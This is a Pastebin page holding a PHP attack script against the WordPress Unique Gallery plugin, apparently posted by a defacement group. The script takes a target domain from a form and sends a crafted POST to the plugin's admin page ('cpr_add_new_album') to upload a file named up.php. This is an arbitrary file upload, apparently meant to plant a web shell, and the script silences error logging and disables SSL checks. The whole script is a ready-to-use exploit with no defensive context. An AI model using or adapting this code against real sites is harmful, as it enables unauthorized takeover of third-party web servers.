Advertisement
AZZATSSINS_CYBERSERK

WP Unique Gallery (CSRF)

Sep 3rd, 2016
243
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.42 KB | None | 0 0
  1. <?php
  2. @session_start();
  3. @error_reporting(0);
  4. @ini_set('error_log',NULL);
  5. @ini_set('log_errors',0);
  6. @ini_set('display_errors', 0);
  7. @set_time_limit(0);
  8. /*
  9. Name app : Wordpress Unique Gallery (AFU)
  10. Author / Editor Script : AZZATSSINS CYBERSERKERS
  11. */
  12. echo"<title>WordPress Unique Gallery AFU</title><center>
  13. <body bgcolor=silver><u><i><b><h1>&copy; AZZATSSINS CYBERSERKERS</h1>
  14. </b></i></u><br>
  15.     <form method='post'>
  16.     Domain: <br>
  17.     <textarea placeholder='http://www.target.com/' name='url' style='width: 500px; height: 20px;'></textarea><br>
  18.     <input type='submit' name='azzatssins' value='Fuck it...!'>
  19.     </form>";
  20.     $site = $_POST['url'];
  21. if($_POST['azzatssins']) {
  22. echo "<br><u><b>Target : ".$site."</b></u><br>";
  23. $post = array(
  24. "task" => "cpr_add_new_album",
  25. "album_name" => "AZZATSSINS",
  26. "album_desc" => "AZZATSSINS",
  27. "album_img" => "@up.php",
  28. );
  29. $ch = curl_init ("$site/wp-admin/admin.php?page=unique_manage");
  30. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  31. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  32. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  33. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
  34. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  35. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  36. curl_setopt ($ch, CURLOPT_POST, 1);
  37. @curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  38. $data = curl_exec ($ch);
  39. curl_close ($ch);
  40. }
  41. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement